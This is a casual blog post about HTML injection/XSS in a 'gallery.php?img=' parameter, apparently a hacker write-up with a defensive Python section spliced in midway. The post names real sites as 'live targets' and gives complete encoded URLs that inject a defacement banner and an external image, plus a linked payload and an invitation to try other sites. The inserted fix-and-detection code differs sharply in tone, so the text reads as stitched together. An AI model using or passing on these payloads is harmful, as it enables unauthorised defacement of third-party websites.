Yo, what's up guys :v
Welcome to my blog hehe..
This time we'll cover XSS in a URL parameter.
Usually a site with parameters is vulnerable to SQLi (if it hasn't been patched); now I'll share XSS and HTML injection. Just follow along, it's easy bro :v
# Title: Switch Cross Site Scripting (XSS)
# Date: 2020-05-23
# Vendor Homepage: Switch.sc and alert
# Tested on: Windows 7 & Google Chrome
# Vulnerable File: /gallery.php?img=
# My Payload : https://pastebin.com/TwQesM5Q
*A site that's vulnerable to SQLi works too, bro; the point is that you fill in the parameter hehe..

Live Target : http://www.sunresort.sc/en/gallery.php?img=1

Enter the payload by deleting the number 1 and putting the payload in its place.
Example:
http://www.sunresort.sc/en/gallery.php?img=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

http://www.stmik-time.ac.id/cari.php?txtcarikonten=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E
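The two URLs above work because gallery.php echoes whatever is in the img parameter straight into the HTML. The block below is an added example, not code from the post or from the sites mentioned; it models that defect in Python with a hypothetical render function, then shows the two fixes a developer would apply (output encoding, which in PHP is htmlspecialchars, and validating the value as an integer id) and a simple check a defender could run over the query strings in an access log. The URL values are constructed samples.

```python
"""Reflected HTML injection via a URL parameter: the defect, two fixes, and a log check."""
import html
import re
from urllib.parse import parse_qs, urlsplit, unquote

# Constructed samples with the same shape as the post's URLs (example.invalid is not a real host).
VULN_URL = "http://example.invalid/en/gallery.php?img=%3Cb%3Einjected%3C/b%3E"
BENIGN_URL = "http://example.invalid/en/gallery.php?img=1"


def img_param(url: str) -> str:
    """Return the percent-decoded value of the img query parameter ('' if absent)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("img", [""])[0]


def render_vulnerable(img: str) -> str:
    """Hypothetical model of the defective page: the value is reflected verbatim."""
    return f"<h1>Gallery image {img}</h1>"


def render_escaped(img: str) -> str:
    """Fix 1: HTML-encode the value before it is placed in markup."""
    return f"<h1>Gallery image {html.escape(img, quote=True)}</h1>"


def render_validated(img: str) -> str:
    """Fix 2: img is an image id, so accept only a positive integer and reject everything else."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", img):
        raise ValueError("invalid image id")
    return f"<h1>Gallery image {int(img)}</h1>"


# A tag opener: '<' optionally followed by '/' and then a letter.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def flag_request(query_string: str) -> bool:
    """Detection: percent-decode the raw query string (twice, so a double-encoded
    %253C is also seen) and report whether any tag opener appears in it."""
    decoded = unquote(unquote(query_string))
    return TAG_RE.search(decoded) is not None


if __name__ == "__main__":
    value = img_param(VULN_URL)
    print("reflected :", render_vulnerable(value))
    print("escaped   :", render_escaped(value))
    try:
        render_validated(value)
    except ValueError as exc:
        print("validated :", exc)
    for qs in ("img=1", "img=%3Cb%3Ex%3C/b%3E", "img=%253Cb%253E"):
        print(f"{qs!r:28} flagged={flag_request(qs)}")
```

Either fix alone stops the injection shown in the post; applying both (validate the id, and still encode on output) is the usual choice, because the encoding also protects any other place the same template echoes user input.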

Easy, right, friends :D
This counts as an XSS bug, but not every site with parameters is vulnerable to it hehe..
You can also read my other articles hehehe :)
References:
https://cxsecurity.com/issue/WLB-2020050186